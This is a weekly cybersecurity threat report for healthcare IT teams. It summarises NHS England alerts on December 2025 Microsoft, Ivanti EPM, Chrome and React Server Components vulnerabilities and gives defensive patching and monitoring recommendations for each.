15.12.25 Threat Report

This week’s report: fresh exploits and old flaws re-weaponised. Microsoft, Chrome and React all shipped security fixes, and endpoint management platforms remain a high-value route into estates. If you manage clinical endpoints, patient-facing web apps, or enterprise admin tooling, this is a week to prioritise updates and tighten monitoring...

Microsoft December 2025 security updates

NHS England flagged Microsoft’s scheduled December updates, addressing 57 vulnerabilities across Microsoft products. One vulnerability is under active exploitation (CVE-2025-62221: Windows Cloud Files Mini Filter Driver elevation of privilege), and two are publicly disclosed: GitHub Copilot for JetBrains remote code execution (CVE-2025-64671) and a PowerShell remote code execution issue (CVE-2025-54100). While the exploited item is an elevation of privilege (often used after initial access), it can materially increase blast radius by turning a foothold into SYSTEM-level control. NHS CSOC assesses future exploitation as likely, so teams should treat this as a rapid patch priority across servers and endpoints, especially where clinical access and shared devices increase impact.

Why it matters:
Windows estates underpin clinical operations, from shared workstations to back-office services. Exploited privilege-escalation bugs shorten the time from “one compromised user” to “estate-wide impact,” which is exactly how ransomware and data theft accelerate in healthcare environments.

Recommendations:

• Apply Microsoft’s December updates as soon as possible, prioritising privileged tiers and shared clinical endpoints.

• Review PowerShell controls (ASR rules, constrained scripting where appropriate) and monitor for unusual script execution post-patch.

• Validate EDR coverage and logging on endpoints used for EPR, PACS and admin access.

Ivanti Endpoint Manager vulnerabilities (pre-2024 SU4) with proof-of-concept available

NHS England issued an alert covering one critical and three high-severity issues in Ivanti Endpoint Manager (EPM), affecting versions prior to 2024 SU4. The alert notes a published proof-of-concept exploit for CVE-2025-10573 (stored XSS, CVSS 9.6) and highlights that multiple bugs could enable remote attackers to reach remote code execution in the context of an administrator session, particularly where user interaction is possible. NHS CSOC assesses future exploitation as likely. Endpoint management platforms are especially sensitive: they sit close to software distribution and device control. Even if exploitation requires a step of user/admin interaction, the upside for attackers makes this class of vulnerability a frequent target.

Why it matters:
Health organisations depend on endpoint tooling for patching and device operations. If EPM is compromised, attackers can push malicious changes, harvest credentials, and accelerate ransomware deployment across clinical endpoints—turning a single weakness into a broad operational incident.

Recommendations:

• Upgrade Ivanti EPM to the fixed build referenced in vendor guidance (2024 SU4 SR1).

• Restrict administrative access to EPM consoles (VPN/jump host, IP allow-lists) and enforce MFA on admin accounts.

• Review admin-session activity and web logs for unusual requests consistent with XSS/file-write abuse.

Google Chrome security update fixes an exploited vulnerability (Chrome Issue 466192044)

NHS England highlighted Google’s Chrome stable-channel update addressing one high-severity vulnerability with an exploit in the wild, tracked as Chrome Issue ID 466192044. The advisory also lists two medium-severity CVEs: CVE-2025-14372 (use-after-free in Password Manager) and CVE-2025-14373 (inappropriate implementation in Toolbar). Google typically withholds full details until most users have patched, which means attackers often race defenders during the early update window. In healthcare, browsers are frontline software: staff use them for portals, cloud services, email and sometimes clinical tooling. Treat exploited Chrome updates as urgent, even when details are limited at first.

Why it matters:
Browsers are where phishing, credential theft and “one-click” compromises begin. An exploited Chrome bug can become the first step to stolen credentials, hijacked sessions and downstream access to sensitive systems—especially on shared or time-pressured clinical workstations.

Recommendations:

• Update Chrome to the latest stable version across Windows/macOS/Linux and confirm fleet compliance.

• Tighten extension controls (approved list, block sideloading) and consider browser isolation for high-risk workflows.

• Monitor for unusual sign-ins to clinical SaaS after rollouts (credential replay can spike during exploit waves).

React Server Components security updates (DoS and source code exposure)

NHS England issued an alert for three vulnerabilities in React Server Components affecting key server DOM packages (webpack/parcel/turbopack). Two are denial-of-service issues (CVE-2025-55184 and CVE-2025-67779) and one is a source code exposure flaw (CVE-2025-55183). The alert notes the initial fix for CVE-2025-55184 was incomplete and that a complete fix is now issued under CVE-2025-67779—meaning teams that “already patched” may still be vulnerable and need to upgrade again. DoS flaws can take patient-facing services offline, and source exposure can leak logic that helps attackers find further weaknesses. For platforms built on React/Next.js-style stacks, this is a strong patch priority.

Why it matters:
Patient portals, booking services and clinician dashboards are often built on modern JavaScript frameworks. A DoS condition can knock services offline during peak demand, and source code exposure can reveal sensitive server-side logic—raising the risk of follow-on exploitation and data access.

Recommendations:

• Upgrade React Server Components to the patched versions referenced in vendor guidance; re-check environments previously updated for CVE-2025-55184.

• Add rate limiting and request anomaly detection on server function endpoints to reduce DoS risk.

• Review incident runbooks for rapid rollback/feature flags on patient-facing web services.

Visit www.periculo.co.uk to learn about Periculo’s Threat Intelligence to keep up-to-date with the latest threats.